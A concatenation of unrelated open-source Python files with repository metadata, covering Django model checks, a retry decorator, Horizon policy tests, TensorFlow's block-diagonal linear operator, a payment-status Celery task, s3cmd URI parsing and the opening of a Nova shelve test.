opts = cls._meta
valid_fields = set(chain.from_iterable(
(f.name, f.attname) if not (f.auto_created and not f.concrete) else (f.field.related_query_name(),)
for f in chain(opts.fields, opts.related_objects)
))
invalid_fields.extend(fields - valid_fields)
for invalid_field in invalid_fields:
errors.append(
checks.Error(
"'ordering' refers to the nonexistent field '%s'." % invalid_field,
obj=cls,
id='models.E015',
)
)
return errors
@classmethod
def _check_long_column_names(cls):
"""
Check that any auto-generated column names are shorter than the limits
for each database in which the model will be created.
"""
errors = []
allowed_len = None
db_alias = None
# Find the minimum max allowed length among all specified db_aliases.
for db in settings.DATABASES.keys():
# skip databases where the model won't be created
if not router.allow_migrate_model(db, cls):
continue
connection = connections[db]
max_name_length = connection.ops.max_name_length()
if max_name_length is None or connection.features.truncates_names:
continue
else:
if allowed_len is None:
allowed_len = max_name_length
db_alias = db
elif max_name_length < allowed_len:
allowed_len = max_name_length
db_alias = db
if allowed_len is None:
return errors
for f in cls._meta.local_fields:
_, column_name = f.get_attname_column()
# Check if auto-generated name for the field is too long
# for the database.
if f.db_column is None and column_name is not None and len(column_name) > allowed_len:
errors.append(
checks.Error(
'Autogenerated column name too long for field "%s". '
'Maximum length is "%s" for database "%s".'
% (column_name, allowed_len, db_alias),
hint="Set the column name manually using 'db_column'.",
obj=cls,
id='models.E018',
)
)
for f in cls._meta.local_many_to_many:
# Skip nonexistent models.
if isinstance(f.remote_field.through, str):
continue
# Check if auto-generated name for the M2M field is too long
# for the database.
for m2m in f.remote_field.through._meta.local_fields:
_, rel_name = m2m.get_attname_column()
if m2m.db_column is None and rel_name is not None and len(rel_name) > allowed_len:
errors.append(
checks.Error(
'Autogenerated column name too long for M2M field '
'"%s". Maximum length is "%s" for database "%s".'
% (rel_name, allowed_len, db_alias),
hint=(
"Use 'through' to create a separate model for "
"M2M and then set column_name using 'db_column'."
),
obj=cls,
id='models.E019',
)
)
return errors
############################################
# HELPER FUNCTIONS (CURRIED MODEL METHODS) #
############################################
# ORDERING METHODS #########################
def method_set_order(ordered_obj, self, id_list, using=None):
if using is None:
using = DEFAULT_DB_ALIAS
order_wrt = ordered_obj._meta.order_with_respect_to
filter_args = order_wrt.get_forward_related_filter(self)
# FIXME: It would be nice if there was an "update many" version of update
# for situations like this.
with transaction.atomic(using=using, savepoint=False):
for i, j in enumerate(id_list):
ordered_obj.objects.filter(pk=j, **filter_args).update(_order=i)
def method_get_order(ordered_obj, self):
order_wrt = ordered_obj._meta.order_with_respect_to
filter_args = order_wrt.get_forward_related_filter(self)
pk_name = ordered_obj._meta.pk.name
return ordered_obj.objects.filter(**filter_args).values_list(pk_name, flat=True)
def make_foreign_order_accessors(model, related_model):
setattr(
related_model,
'get_%s_order' % model.__name__.lower(),
curry(method_get_order, model)
)
setattr(
related_model,
'set_%s_order' % model.__name__.lower(),
curry(method_set_order, model)
)
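# Illustrative usage of the accessors wired up above (assumed model names, not
# defined in this module): for
#
#     class Answer(models.Model):
#         question = models.ForeignKey(Question, on_delete=models.CASCADE)
#
#         class Meta:
#             order_with_respect_to = 'question'
#
# make_foreign_order_accessors(Answer, Question) installs
#
#     question.get_answer_order()            # -> ordered list of Answer pks
#     question.set_answer_order([3, 1, 2])   # persists the new _order values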
########
# MISC #
########
def model_unpickle(model_id):
"""Used to unpickle Model subclasses with deferred fields."""
if isinstance(model_id, tuple):
model = apps.get_model(*model_id)
else:
# Backwards compat - the model was cached directly in earlier versions.
model = model_id
return model.__new__(model)
model_unpickle.__safe_for_unpickle__ = True
def unpickle_inner_exception(klass, exception_name):
# Get the exception class from the class it is attached to:
exception = getattr(klass, exception_name)
return exception.__new__(exception)
|
{
"content_hash": "f672ebda4f5b03dc61c1950caa9431c5",
"timestamp": "",
"source": "github",
"line_count": 1716,
"max_line_length": 114,
"avg_line_length": 41.35489510489511,
"alnum_prop": 0.5386739942225041,
"repo_name": "camilonova/django",
"id": "efc8b1862f508becd37dac9ca671023ba6929ba8",
"size": "70965",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "django/db/models/base.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "55935"
},
{
"name": "HTML",
"bytes": "182943"
},
{
"name": "JavaScript",
"bytes": "252645"
},
{
"name": "Makefile",
"bytes": "125"
},
{
"name": "Python",
"bytes": "11830666"
},
{
"name": "Shell",
"bytes": "809"
},
{
"name": "Smarty",
"bytes": "130"
}
],
"symlink_target": ""
}
|
from time import sleep
from functools import wraps
import logging
logging.basicConfig()
log = logging.getLogger("retry")
def retry(f):
@wraps(f)
def wrapped_f(*args, **kwargs):
MAX_ATTEMPTS = 5
for attempt in range(1, MAX_ATTEMPTS + 1):
try:
return f(*args, **kwargs)
            except Exception:  # let SystemExit/KeyboardInterrupt propagate
log.exception("Attempt %s/%s failed : %s",
attempt, MAX_ATTEMPTS, (args, kwargs))
sleep(10 * attempt)
log.critical("All %s attempts failed: %s",
MAX_ATTEMPTS, (args, kwargs))
return wrapped_f
counter = 0
@retry
def save_to_database(arg):
print("Write to a database or make a network call or etc.")
print("This will be automatically retried if exception is thrown.")
global counter
counter += 1
# This will throw an exception in the first call
# And will work fine in second call (i.e. a retry)
if counter < 2:
raise ValueError(arg)
if __name__ == '__main__':
save_to_database("Some bad value")
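# A minimal parameterized variant (illustrative sketch only, not used above):
# it narrows the caught exception types and re-raises once the attempts are
# exhausted instead of returning None.
#
# def retry_times(max_attempts=5, delay=10, exceptions=(Exception,)):
#     def decorator(f):
#         @wraps(f)
#         def wrapper(*args, **kwargs):
#             for attempt in range(1, max_attempts + 1):
#                 try:
#                     return f(*args, **kwargs)
#                 except exceptions:
#                     if attempt == max_attempts:
#                         raise
#                     log.exception("Attempt %s/%s failed", attempt, max_attempts)
#                     sleep(delay * attempt)
#         return wrapper
#     return decorator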
|
{
"content_hash": "e27709bfe28a215d93e3780534183d80",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 71,
"avg_line_length": 28.72972972972973,
"alnum_prop": 0.5888993414863594,
"repo_name": "pezy/python_test",
"id": "1e7080fc2fa841ec108a43fcfbb6e3cf51eab9cd",
"size": "1063",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "byteofpy/more_decorator.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "21331"
}
],
"symlink_target": ""
}
|
from django.test.utils import override_settings
from openstack_auth import policy as policy_backend
from openstack_dashboard import policy
from openstack_dashboard.test import helpers as test
class PolicyBackendTestCase(test.TestCase):
def test_policy_file_load(self):
policy_backend.reset()
enforcer = policy_backend._get_enforcer()
self.assertEqual(2, len(enforcer))
self.assertTrue('identity' in enforcer)
self.assertTrue('compute' in enforcer)
def test_policy_reset(self):
policy_backend._get_enforcer()
self.assertEqual(2, len(policy_backend._ENFORCER))
policy_backend.reset()
self.assertIsNone(policy_backend._ENFORCER)
@override_settings(POLICY_CHECK_FUNCTION=policy_backend.check)
def test_check_admin_required_false(self):
policy_backend.reset()
value = policy.check((("identity", "admin_required"),),
request=self.request)
self.assertFalse(value)
@override_settings(POLICY_CHECK_FUNCTION=policy_backend.check)
def test_check_identity_rule_not_found_false(self):
policy_backend.reset()
value = policy.check((("identity", "i_dont_exist"),),
request=self.request)
# this should fail because the default check for
# identity is admin_required
self.assertFalse(value)
@override_settings(POLICY_CHECK_FUNCTION=policy_backend.check)
def test_check_nova_context_is_admin_false(self):
policy_backend.reset()
value = policy.check((("compute", "context_is_admin"),),
request=self.request)
self.assertFalse(value)
@override_settings(POLICY_CHECK_FUNCTION=policy_backend.check)
def test_compound_check_false(self):
policy_backend.reset()
value = policy.check((("identity", "admin_required"),
("identity", "identity:default"),),
request=self.request)
self.assertFalse(value)
@override_settings(POLICY_CHECK_FUNCTION=policy_backend.check)
def test_scope_not_found(self):
policy_backend.reset()
value = policy.check((("dummy", "default"),),
request=self.request)
self.assertTrue(value)
class PolicyBackendTestCaseAdmin(test.BaseAdminViewTests):
@override_settings(POLICY_CHECK_FUNCTION=policy_backend.check)
def test_check_admin_required_true(self):
policy_backend.reset()
value = policy.check((("identity", "admin_required"),),
request=self.request)
self.assertTrue(value)
@override_settings(POLICY_CHECK_FUNCTION=policy_backend.check)
def test_check_identity_rule_not_found_true(self):
policy_backend.reset()
value = policy.check((("identity", "i_dont_exist"),),
request=self.request)
# this should succeed because the default check for
# identity is admin_required
self.assertTrue(value)
@override_settings(POLICY_CHECK_FUNCTION=policy_backend.check)
def test_compound_check_true(self):
policy_backend.reset()
value = policy.check((("identity", "admin_required"),
("identity", "identity:default"),),
request=self.request)
self.assertTrue(value)
@override_settings(POLICY_CHECK_FUNCTION=policy_backend.check)
def test_check_nova_context_is_admin_true(self):
policy_backend.reset()
value = policy.check((("compute", "context_is_admin"),),
request=self.request)
self.assertTrue(value)
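# Reference note (derived from the calls above, not additional behaviour):
# policy.check() takes an iterable of (scope, rule) tuples and only returns
# True when every rule passes for the request's credentials, e.g.
#
#     policy.check((("identity", "admin_required"),
#                   ("compute", "context_is_admin")), request=request)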
|
{
"content_hash": "48f4bcbec4e41a032591483bdf385c9d",
"timestamp": "",
"source": "github",
"line_count": 91,
"max_line_length": 66,
"avg_line_length": 40.81318681318681,
"alnum_prop": 0.6284329563812601,
"repo_name": "bigswitch/horizon",
"id": "48e7b822858efd9f17c3c66634f6c921214b4c82",
"size": "4287",
"binary": false,
"copies": "13",
"ref": "refs/heads/master",
"path": "openstack_dashboard/test/tests/policy_backend.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "169426"
},
{
"name": "HTML",
"bytes": "504623"
},
{
"name": "JavaScript",
"bytes": "2470379"
},
{
"name": "Makefile",
"bytes": "588"
},
{
"name": "Python",
"bytes": "5016450"
},
{
"name": "Shell",
"bytes": "20010"
}
],
"symlink_target": ""
}
|
"""Create a Block Diagonal operator from one or more `LinearOperators`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import common_shapes
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops.linalg import linear_operator
from tensorflow.python.ops.linalg import linear_operator_util
from tensorflow.python.util.tf_export import tf_export
__all__ = ["LinearOperatorBlockDiag"]
@tf_export("linalg.LinearOperatorBlockDiag")
class LinearOperatorBlockDiag(linear_operator.LinearOperator):
"""Combines one or more `LinearOperators` in to a Block Diagonal matrix.
This operator combines one or more linear operators `[op1,...,opJ]`,
building a new `LinearOperator`, whose underlying matrix representation is
  square and has each operator `opi` on the main diagonal, and zeros elsewhere.
#### Shape compatibility
If `opj` acts like a [batch] square matrix `Aj`, then `op_combined` acts like
the [batch] square matrix formed by having each matrix `Aj` on the main
diagonal.
Each `opj` is required to represent a square matrix, and hence will have
shape `batch_shape_j + [M_j, M_j]`.
If `opj` has shape `batch_shape_j + [M_j, M_j]`, then the combined operator
has shape `broadcast_batch_shape + [sum M_j, sum M_j]`, where
`broadcast_batch_shape` is the mutual broadcast of `batch_shape_j`,
`j = 1,...,J`, assuming the intermediate batch shapes broadcast.
Even if the combined shape is well defined, the combined operator's
methods may fail due to lack of broadcasting ability in the defining
operators' methods.
```python
# Create a 4 x 4 linear operator combined of two 2 x 2 operators.
operator_1 = LinearOperatorFullMatrix([[1., 2.], [3., 4.]])
operator_2 = LinearOperatorFullMatrix([[1., 0.], [0., 1.]])
operator = LinearOperatorBlockDiag([operator_1, operator_2])
operator.to_dense()
==> [[1., 2., 0., 0.],
[3., 4., 0., 0.],
[0., 0., 1., 0.],
[0., 0., 0., 1.]]
operator.shape
==> [4, 4]
operator.log_abs_determinant()
==> scalar Tensor
x1 = ... # Shape [2, 2] Tensor
x2 = ... # Shape [2, 2] Tensor
x = tf.concat([x1, x2], 0) # Shape [2, 4] Tensor
operator.matmul(x)
==> tf.concat([operator_1.matmul(x1), operator_2.matmul(x2)])
# Create a [2, 3] batch of 4 x 4 linear operators.
matrix_44 = tf.random.normal(shape=[2, 3, 4, 4])
  operator_44 = LinearOperatorFullMatrix(matrix_44)
# Create a [1, 3] batch of 5 x 5 linear operators.
matrix_55 = tf.random.normal(shape=[1, 3, 5, 5])
operator_55 = LinearOperatorFullMatrix(matrix_55)
# Combine to create a [2, 3] batch of 9 x 9 operators.
operator_99 = LinearOperatorBlockDiag([operator_44, operator_55])
# Create a shape [2, 3, 9] vector.
x = tf.random.normal(shape=[2, 3, 9])
operator_99.matmul(x)
==> Shape [2, 3, 9] Tensor
```
#### Performance
The performance of `LinearOperatorBlockDiag` on any operation is equal to
the sum of the individual operators' operations.
#### Matrix property hints
This `LinearOperator` is initialized with boolean flags of the form `is_X`,
for `X = non_singular, self_adjoint, positive_definite, square`.
These have the following meaning:
* If `is_X == True`, callers should expect the operator to have the
property `X`. This is a promise that should be fulfilled, but is *not* a
runtime assert. For example, finite floating point precision may result
in these promises being violated.
* If `is_X == False`, callers should expect the operator to not have `X`.
* If `is_X == None` (the default), callers should have no expectation either
way.
"""
def __init__(self,
operators,
is_non_singular=None,
is_self_adjoint=None,
is_positive_definite=None,
is_square=True,
name=None):
r"""Initialize a `LinearOperatorBlockDiag`.
`LinearOperatorBlockDiag` is initialized with a list of operators
`[op_1,...,op_J]`.
Args:
operators: Iterable of `LinearOperator` objects, each with
the same `dtype` and composable shape.
is_non_singular: Expect that this operator is non-singular.
is_self_adjoint: Expect that this operator is equal to its hermitian
transpose.
is_positive_definite: Expect that this operator is positive definite,
meaning the quadratic form `x^H A x` has positive real part for all
nonzero `x`. Note that we do not require the operator to be
self-adjoint to be positive-definite. See:
https://en.wikipedia.org/wiki/Positive-definite_matrix#Extension_for_non-symmetric_matrices
is_square: Expect that this operator acts like square [batch] matrices.
This is true by default, and will raise a `ValueError` otherwise.
name: A name for this `LinearOperator`. Default is the individual
operators names joined with `_o_`.
Raises:
TypeError: If all operators do not have the same `dtype`.
ValueError: If `operators` is empty or are non-square.
"""
# Validate operators.
check_ops.assert_proper_iterable(operators)
operators = list(operators)
if not operators:
raise ValueError(
"Expected a non-empty list of operators. Found: %s" % operators)
self._operators = operators
# Validate dtype.
dtype = operators[0].dtype
for operator in operators:
if operator.dtype != dtype:
name_type = (str((o.name, o.dtype)) for o in operators)
raise TypeError(
"Expected all operators to have the same dtype. Found %s"
% " ".join(name_type))
# Auto-set and check hints.
if all(operator.is_non_singular for operator in operators):
if is_non_singular is False:
raise ValueError(
"The direct sum of non-singular operators is always non-singular.")
is_non_singular = True
if all(operator.is_self_adjoint for operator in operators):
if is_self_adjoint is False:
raise ValueError(
"The direct sum of self-adjoint operators is always self-adjoint.")
is_self_adjoint = True
if all(operator.is_positive_definite for operator in operators):
if is_positive_definite is False:
raise ValueError(
"The direct sum of positive definite operators is always "
"positive definite.")
is_positive_definite = True
if not (is_square and all(operator.is_square for operator in operators)):
raise ValueError(
"Can only represent a block diagonal of square matrices.")
# Initialization.
graph_parents = []
for operator in operators:
graph_parents.extend(operator.graph_parents)
if name is None:
# Using ds to mean direct sum.
name = "_ds_".join(operator.name for operator in operators)
with ops.name_scope(name, values=graph_parents):
super(LinearOperatorBlockDiag, self).__init__(
dtype=dtype,
graph_parents=graph_parents,
is_non_singular=is_non_singular,
is_self_adjoint=is_self_adjoint,
is_positive_definite=is_positive_definite,
is_square=True,
name=name)
@property
def operators(self):
return self._operators
def _shape(self):
# Get final matrix shape.
domain_dimension = self.operators[0].domain_dimension
range_dimension = self.operators[0].range_dimension
for operator in self.operators[1:]:
domain_dimension += operator.domain_dimension
range_dimension += operator.range_dimension
matrix_shape = tensor_shape.TensorShape([domain_dimension, range_dimension])
# Get broadcast batch shape.
# broadcast_shape checks for compatibility.
batch_shape = self.operators[0].batch_shape
for operator in self.operators[1:]:
batch_shape = common_shapes.broadcast_shape(
batch_shape, operator.batch_shape)
return batch_shape.concatenate(matrix_shape)
def _shape_tensor(self):
# Avoid messy broadcasting if possible.
if self.shape.is_fully_defined():
return ops.convert_to_tensor(
self.shape.as_list(), dtype=dtypes.int32, name="shape")
domain_dimension = self.operators[0].domain_dimension_tensor()
range_dimension = self.operators[0].range_dimension_tensor()
for operator in self.operators[1:]:
domain_dimension += operator.domain_dimension_tensor()
range_dimension += operator.range_dimension_tensor()
matrix_shape = array_ops.stack([domain_dimension, range_dimension])
# Dummy Tensor of zeros. Will never be materialized.
zeros = array_ops.zeros(shape=self.operators[0].batch_shape_tensor())
for operator in self.operators[1:]:
zeros += array_ops.zeros(shape=operator.batch_shape_tensor())
batch_shape = array_ops.shape(zeros)
return array_ops.concat((batch_shape, matrix_shape), 0)
def _matmul(self, x, adjoint=False, adjoint_arg=False):
split_dim = -1 if adjoint_arg else -2
# Split input by rows normally, and otherwise columns.
split_x = self._split_input_into_blocks(x, axis=split_dim)
result_list = []
for index, operator in enumerate(self.operators):
result_list += [operator.matmul(
split_x[index], adjoint=adjoint, adjoint_arg=adjoint_arg)]
result_list = linear_operator_util.broadcast_matrix_batch_dims(
result_list)
return array_ops.concat(result_list, axis=-2)
def _determinant(self):
result = self.operators[0].determinant()
for operator in self.operators[1:]:
result *= operator.determinant()
return result
def _log_abs_determinant(self):
result = self.operators[0].log_abs_determinant()
for operator in self.operators[1:]:
result += operator.log_abs_determinant()
return result
def _solve(self, rhs, adjoint=False, adjoint_arg=False):
split_dim = -1 if adjoint_arg else -2
# Split input by rows normally, and otherwise columns.
split_rhs = self._split_input_into_blocks(rhs, axis=split_dim)
solution_list = []
for index, operator in enumerate(self.operators):
solution_list += [operator.solve(
split_rhs[index], adjoint=adjoint, adjoint_arg=adjoint_arg)]
solution_list = linear_operator_util.broadcast_matrix_batch_dims(
solution_list)
return array_ops.concat(solution_list, axis=-2)
def _diag_part(self):
diag_list = []
for operator in self.operators:
# Extend the axis for broadcasting.
diag_list += [operator.diag_part()[..., array_ops.newaxis]]
diag_list = linear_operator_util.broadcast_matrix_batch_dims(diag_list)
diagonal = array_ops.concat(diag_list, axis=-2)
return array_ops.squeeze(diagonal, axis=-1)
def _trace(self):
result = self.operators[0].trace()
for operator in self.operators[1:]:
result += operator.trace()
return result
def _to_dense(self):
num_cols = 0
rows = []
broadcasted_blocks = [operator.to_dense() for operator in self.operators]
broadcasted_blocks = linear_operator_util.broadcast_matrix_batch_dims(
broadcasted_blocks)
for block in broadcasted_blocks:
batch_row_shape = array_ops.shape(block)[:-1]
zeros_to_pad_before_shape = array_ops.concat(
[batch_row_shape, [num_cols]], axis=-1)
zeros_to_pad_before = array_ops.zeros(
shape=zeros_to_pad_before_shape, dtype=block.dtype)
num_cols += array_ops.shape(block)[-1]
zeros_to_pad_after_shape = array_ops.concat(
[batch_row_shape,
[self.domain_dimension_tensor() - num_cols]], axis=-1)
zeros_to_pad_after = array_ops.zeros(
shape=zeros_to_pad_after_shape, dtype=block.dtype)
rows.append(array_ops.concat(
[zeros_to_pad_before, block, zeros_to_pad_after], axis=-1))
mat = array_ops.concat(rows, axis=-2)
mat.set_shape(self.shape)
return mat
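  # Illustrative trace of the padding in _to_dense() above (comments only):
  # for two square blocks A_0 (2 x 2) and A_1 (3 x 3), domain_dimension is 5
  # and the row groups are assembled as
  #
  #   concat([zeros[..., 2, 0], A_0, zeros[..., 2, 3]], axis=-1)
  #   concat([zeros[..., 3, 2], A_1, zeros[..., 3, 0]], axis=-1)
  #
  # i.e. each block gets `num_cols` zero columns on the left and the remaining
  # columns of zeros on the right.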
def _assert_non_singular(self):
return control_flow_ops.group([
operator.assert_non_singular() for operator in self.operators])
def _assert_self_adjoint(self):
return control_flow_ops.group([
operator.assert_self_adjoint() for operator in self.operators])
def _assert_positive_definite(self):
return control_flow_ops.group([
operator.assert_positive_definite() for operator in self.operators])
def _split_input_into_blocks(self, x, axis=-1):
"""Split `x` into blocks matching `operators`'s `domain_dimension`.
Specifically, if we have a block diagonal matrix, with block sizes
`[M_j, M_j] j = 1..J`, this method splits `x` on `axis` into `J`
tensors, whose shape at `axis` is `M_j`.
Args:
x: `Tensor`. `x` is split into `J` tensors.
axis: Python `Integer` representing the axis to split `x` on.
Returns:
A list of `Tensor`s.
"""
block_sizes = []
if self.shape.is_fully_defined():
for operator in self.operators:
block_sizes += [operator.domain_dimension.value]
else:
for operator in self.operators:
block_sizes += [operator.domain_dimension_tensor()]
return array_ops.split(x, block_sizes, axis=axis)
|
{
"content_hash": "8d2e03b61660d04266fbe72aa6704fd6",
"timestamp": "",
"source": "github",
"line_count": 360,
"max_line_length": 99,
"avg_line_length": 37.41388888888889,
"alnum_prop": 0.6717647932288959,
"repo_name": "ghchinoy/tensorflow",
"id": "6a3c0debaff78ef4ff7a2b42f07a8a7ce965abb6",
"size": "14158",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "tensorflow/python/ops/linalg/linear_operator_block_diag.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "3568"
},
{
"name": "Batchfile",
"bytes": "15317"
},
{
"name": "C",
"bytes": "699905"
},
{
"name": "C#",
"bytes": "8446"
},
{
"name": "C++",
"bytes": "67022491"
},
{
"name": "CMake",
"bytes": "206499"
},
{
"name": "Dockerfile",
"bytes": "73602"
},
{
"name": "Go",
"bytes": "1585039"
},
{
"name": "HTML",
"bytes": "4680118"
},
{
"name": "Java",
"bytes": "836400"
},
{
"name": "Jupyter Notebook",
"bytes": "1665583"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "98194"
},
{
"name": "Objective-C",
"bytes": "94022"
},
{
"name": "Objective-C++",
"bytes": "175222"
},
{
"name": "PHP",
"bytes": "17600"
},
{
"name": "Pascal",
"bytes": "3239"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "Python",
"bytes": "48407007"
},
{
"name": "RobotFramework",
"bytes": "891"
},
{
"name": "Ruby",
"bytes": "4733"
},
{
"name": "Shell",
"bytes": "476920"
},
{
"name": "Smarty",
"bytes": "27495"
},
{
"name": "Swift",
"bytes": "56155"
}
],
"symlink_target": ""
}
|
import logging
from celery.task.base import task
from django.db.models.loading import get_model
logger = logging.getLogger('getpaid.backends.przelewy24')
@task
def get_payment_status_task(payment_id, p24_session_id, p24_order_id, p24_kwota):
Payment = get_model('getpaid', 'Payment')
try:
payment = Payment.objects.get(pk=int(payment_id))
except Payment.DoesNotExist:
logger.error('Payment does not exist pk=%d' % payment_id)
return
from getpaid.backends.przelewy24 import PaymentProcessor # Avoiding circular import
processor = PaymentProcessor(payment)
processor.get_payment_status(p24_session_id, p24_order_id, p24_kwota)
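# Illustrative enqueueing (assumption, not defined here): the Przelewy24 status
# view would typically schedule this check asynchronously with
#
#     get_payment_status_task.delay(payment.pk, p24_session_id,
#                                   p24_order_id, p24_kwota)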
|
{
"content_hash": "e691fd52d7c58aa02e778484ac863ebf",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 88,
"avg_line_length": 35.68421052631579,
"alnum_prop": 0.7315634218289085,
"repo_name": "pawciobiel/django-getpaid",
"id": "ec04a43d47eef6c88f63e5315cc57acb69246b37",
"size": "678",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "getpaid/backends/przelewy24/tasks.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "6266"
},
{
"name": "Python",
"bytes": "156307"
}
],
"symlink_target": ""
}
|
import os
import re
import sys
from BidirMap import BidirMap
from logging import debug
import S3
from Utils import unicodise, check_bucket_name_dns_conformity
class S3Uri(object):
type = None
_subclasses = None
def __new__(self, string):
if not self._subclasses:
## Generate a list of all subclasses of S3Uri
self._subclasses = []
dict = sys.modules[__name__].__dict__
for something in dict:
if type(dict[something]) is not type(self):
continue
if issubclass(dict[something], self) and dict[something] != self:
self._subclasses.append(dict[something])
for subclass in self._subclasses:
try:
instance = object.__new__(subclass)
instance.__init__(string)
return instance
except ValueError, e:
continue
raise ValueError("%s: not a recognized URI" % string)
def __str__(self):
return self.uri()
def __unicode__(self):
return self.uri()
def __repr__(self):
return "<%s: %s>" % (self.__class__.__name__, self.__unicode__())
def public_url(self):
raise ValueError("This S3 URI does not have Anonymous URL representation")
def basename(self):
return self.__unicode__().split("/")[-1]
class S3UriS3(S3Uri):
type = "s3"
_re = re.compile("^s3://([^/]+)/?(.*)", re.IGNORECASE)
def __init__(self, string):
match = self._re.match(string)
if not match:
raise ValueError("%s: not a S3 URI" % string)
groups = match.groups()
self._bucket = groups[0]
self._object = unicodise(groups[1])
def bucket(self):
return self._bucket
def object(self):
return self._object
def has_bucket(self):
return bool(self._bucket)
def has_object(self):
return bool(self._object)
def uri(self):
return "/".join(["s3:/", self._bucket, self._object])
def is_dns_compatible(self):
return check_bucket_name_dns_conformity(self._bucket)
def public_url(self):
if self.is_dns_compatible():
return "http://%s.s3.amazonaws.com/%s" % (self._bucket, self._object)
else:
return "http://s3.amazonaws.com/%s/%s" % (self._bucket, self._object)
def host_name(self):
if self.is_dns_compatible():
return "%s.s3.amazonaws.com" % (self._bucket)
else:
return "s3.amazonaws.com"
@staticmethod
def compose_uri(bucket, object = ""):
return "s3://%s/%s" % (bucket, object)
@staticmethod
def httpurl_to_s3uri(http_url):
m=re.match("(https?://)?([^/]+)/?(.*)", http_url, re.IGNORECASE)
hostname, object = m.groups()[1:]
hostname = hostname.lower()
if hostname == "s3.amazonaws.com":
## old-style url: http://s3.amazonaws.com/bucket/object
if object.count("/") == 0:
## no object given
bucket = object
object = ""
else:
## bucket/object
bucket, object = object.split("/", 1)
elif hostname.endswith(".s3.amazonaws.com"):
## new-style url: http://bucket.s3.amazonaws.com/object
bucket = hostname[:-(len(".s3.amazonaws.com"))]
else:
raise ValueError("Unable to parse URL: %s" % http_url)
return S3Uri("s3://%(bucket)s/%(object)s" % {
'bucket' : bucket,
'object' : object })
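# Examples of the mapping performed by S3UriS3.httpurl_to_s3uri() above
# (derived from the parsing logic, not additional behaviour):
#
#     http://s3.amazonaws.com/bucket/key   -> s3://bucket/key   (old-style)
#     http://bucket.s3.amazonaws.com/key   -> s3://bucket/key   (new-style)
#     http://example.com/key               -> ValueError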
class S3UriS3FS(S3Uri):
type = "s3fs"
_re = re.compile("^s3fs://([^/]*)/?(.*)", re.IGNORECASE)
def __init__(self, string):
match = self._re.match(string)
if not match:
raise ValueError("%s: not a S3fs URI" % string)
groups = match.groups()
self._fsname = groups[0]
self._path = unicodise(groups[1]).split("/")
def fsname(self):
return self._fsname
def path(self):
return "/".join(self._path)
def uri(self):
return "/".join(["s3fs:/", self._fsname, self.path()])
class S3UriFile(S3Uri):
type = "file"
_re = re.compile("^(\w+://)?(.*)")
def __init__(self, string):
match = self._re.match(string)
groups = match.groups()
if groups[0] not in (None, "file://"):
raise ValueError("%s: not a file:// URI" % string)
self._path = unicodise(groups[1]).split("/")
def path(self):
return "/".join(self._path)
def uri(self):
return "/".join(["file:/", self.path()])
def isdir(self):
return os.path.isdir(self.path())
def dirname(self):
return os.path.dirname(self.path())
class S3UriCloudFront(S3Uri):
type = "cf"
_re = re.compile("^cf://([^/]*)/*(.*)", re.IGNORECASE)
def __init__(self, string):
match = self._re.match(string)
if not match:
raise ValueError("%s: not a CloudFront URI" % string)
groups = match.groups()
self._dist_id = groups[0]
self._request_id = groups[1] != "/" and groups[1] or None
def dist_id(self):
return self._dist_id
def request_id(self):
return self._request_id
def uri(self):
uri = "cf://" + self.dist_id()
if self.request_id():
uri += "/" + self.request_id()
return uri
if __name__ == "__main__":
uri = S3Uri("s3://bucket/object")
print "type() =", type(uri)
print "uri =", uri
print "uri.type=", uri.type
print "bucket =", uri.bucket()
print "object =", uri.object()
print
uri = S3Uri("s3://bucket")
print "type() =", type(uri)
print "uri =", uri
print "uri.type=", uri.type
print "bucket =", uri.bucket()
print
uri = S3Uri("s3fs://filesystem1/path/to/remote/file.txt")
print "type() =", type(uri)
print "uri =", uri
print "uri.type=", uri.type
print "path =", uri.path()
print
uri = S3Uri("/path/to/local/file.txt")
print "type() =", type(uri)
print "uri =", uri
print "uri.type=", uri.type
print "path =", uri.path()
print
uri = S3Uri("cf://1234567890ABCD/")
print "type() =", type(uri)
print "uri =", uri
print "uri.type=", uri.type
print "dist_id =", uri.dist_id()
print
# vim:et:ts=4:sts=4:ai
|
{
"content_hash": "a802dc46a3c3681a550e353f9e3ad543",
"timestamp": "",
"source": "github",
"line_count": 217,
"max_line_length": 82,
"avg_line_length": 29.63594470046083,
"alnum_prop": 0.532887575804696,
"repo_name": "zhm/s3_cmd_bin",
"id": "e53d46a63936d873f3f49238b0f2d43105272591",
"size": "6560",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "resources/S3/S3Uri.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Perl",
"bytes": "6305"
},
{
"name": "Python",
"bytes": "294114"
},
{
"name": "Ruby",
"bytes": "1256"
},
{
"name": "Shell",
"bytes": "350"
}
],
"symlink_target": ""
}
|
import uuid
import webob
from nova.api.openstack.compute.contrib import shelve as shelve_v2
from nova.api.openstack.compute.plugins.v3 import shelve as shelve_v21
from nova.compute import api as compute_api
from nova import db
from nova import exception
from nova.openstack.common import policy as common_policy
from nova import policy
from nova import test
from nova.tests.unit.api.openstack import fakes
from nova.tests.unit import fake_instance
def fake_instance_get_by_uuid(context, instance_id,
columns_to_join=None, use_slave=False):
return fake_instance.fake_db_instance(
**{'name': 'fake', 'project_id': '%s_unequal' % context.project_id})
def fake_auth_context(context):
return True
class ShelvePolicyTestV21(test.NoDBTestCase):
plugin = shelve_v21
prefix = 'v3:os-shelve:'
offload = 'shelve_offload'
def setUp(self):
super(ShelvePolicyTestV21, self).setUp()
